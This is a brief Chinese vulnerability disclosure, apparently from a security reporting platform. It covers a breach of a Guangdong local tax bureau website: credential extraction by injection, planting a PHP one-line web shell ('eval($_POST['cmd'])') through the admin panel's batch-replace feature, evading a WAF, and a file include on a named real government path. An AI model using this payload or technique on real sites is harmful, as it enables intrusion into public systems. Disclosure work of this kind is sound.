广东某地税已被限制关键词沦陷+qq电脑管家爆风险+可getshell+已被提权下载

注入+后台getshell

1.浏览到该网站时，qq管家爆风险

2.已被限制关键词入侵

3.手动检测一下漏洞，获取帐号密码

破解之，登陆后台

4.寻找各种网上方法，getshell无果，找到扫描木马模块，利用替换功能实现突破

添加栏目名，命名为eval，通过木马查找工具扫描出结果，使用“批量替换功能”将<?php替换为<?php eval($_POST[‘cmd’])，得到一句话木马

直接访问，遇安全狗

5.使用http://www.gmds.gov.cn/formguide-bak/admin/include/formguide_fields.class.php

Include templates/default/formguide/name.inc.php进去执行

6.getshell

7.后来发现更简单的方法，直接替换文件执行命令，远程写入两个文件即可。
 

修复方案：

老程序了，还是换一套吧